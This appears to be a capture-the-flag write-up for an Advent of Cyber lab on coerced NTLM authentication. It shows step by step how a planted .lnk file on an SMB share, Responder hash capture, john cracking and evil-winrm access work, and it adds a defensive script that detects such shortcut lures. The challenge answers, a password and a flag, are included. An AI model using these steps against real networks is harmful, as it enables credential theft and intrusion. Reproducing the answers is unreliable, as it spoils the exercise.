AoC_RelayAllTheWayV6 (AOC_2023 DAY-23)

Prinu_17
Dec 23, 2023

[Day 23] Coerced Authentication Relay All the Way

We use the AttackBox for this challenge.

1. What is the name of the AD authentication protocol that makes use of tickets?

Kerberos

2. What is the name of the AD authentication protocol that makes use of the NTLM hash?

NetNTLM

3. What is the name of the tool that can intercept these authentication challenges?

Responder

4. What is the password that McGreedy set for the Administrator account?

For this, go to the following directory:

cd /root/Rooms/AoC2023/Day23/ntlm_theft/

and then:

cd stealthy

After this, connect to the share with smbclient:

smbclient //10.10.69.51/ElfShare/ -U guest%

//10.10.69.51/ElfShare/: This is the SMB share path you are connecting to.

-U guest%: This specifies the username "guest" with an empty password (nothing follows the "%").

At the smbclient prompt, upload the file and list the share contents:

put stealthy.lnk

dir

Now, in another terminal, run Responder:

responder -I ens5

It took several minutes to connect. In the meantime, download the file mcgreedy.txt.

In the other tab you will see some responses. Copy the hash into hash.txt and run the following:

john --wordlist=greedykeys.txt hash.txt

This gives us the password, which is GreedyGrabber1@.

GreedyGrabbber1@
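From the defender's side, a share that guests can write to can be swept for shortcut files that reference a remote host, which is what a dropped file such as stealthy.lnk relies on to make a browsing user authenticate to a listener. The script below is an added example, not part of the original write-up; the byte-level heuristic, the allowlisted host name fileserver01, the extra file types and the sample bytes are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Shortcut-style files that can carry a remote icon or target path.
# Only .lnk appears on the page; .url and .scf are an assumption added here.
LURE_SUFFIXES = {".lnk", ".url", ".scf"}

# \\host\ as ASCII bytes and as UTF-16LE; shortcut files can store strings either way.
UNC_ASCII = re.compile(rb"\\\\([A-Za-z0-9._-]{1,253})\\")
UNC_UTF16 = re.compile(rb"\\\x00\\\x00((?:[A-Za-z0-9._-]\x00){1,253})\\\x00")


def unc_hosts(data):
    """Return the lower-cased host part of every UNC path found in raw bytes."""
    hosts = {m.group(1).decode("ascii").lower() for m in UNC_ASCII.finditer(data)}
    hosts |= {m.group(1).decode("utf-16-le").lower() for m in UNC_UTF16.finditer(data)}
    return hosts


def scan_share(root, allowed_hosts):
    """Map each shortcut file under root to the non-allowlisted hosts it references."""
    allowed = {h.lower() for h in allowed_hosts}
    findings = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in LURE_SUFFIXES:
            unexpected = unc_hosts(path.read_bytes()) - allowed
            if unexpected:
                findings[str(path.relative_to(root))] = sorted(unexpected)
    return findings


def demo():
    """Scan three constructed files (sample bytes, not real shortcuts)."""
    samples = {
        "stealthy.lnk": b"L\x00\x00\x00" + "\\\\192.0.2.10\\tmp\\icon.ico".encode("utf-16-le"),
        "notes.lnk": b"L\x00\x00\x00" + "C:\\Windows\\System32\\shell32.dll".encode("utf-16-le"),
        "app.lnk": b"L\x00\x00\x00" + b"\\\\fileserver01\\icons\\app.ico",
    }
    with tempfile.TemporaryDirectory() as share:
        for name, data in samples.items():
            (Path(share) / name).write_bytes(data)
        return scan_share(share, allowed_hosts={"fileserver01"})


if __name__ == "__main__":
    for name, hosts in demo().items():
        print(f"{name}: references unexpected host(s) {', '.join(hosts)}")
```

Only the constructed stealthy.lnk is reported: the local-path shortcut contains no UNC path and the one pointing at the allowlisted file server is filtered out.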

5. What is the value of the flag that is placed on the Administrator’s desktop?

For this we use evil-winrm to connect to the Windows machine and go to the Desktop directory.

Here, run ls or dir to list the contents of the directory and find the flag.txt file.

THM{Greedy.Greedy.McNot.So.Great.Stealy}

Thanks for reading!!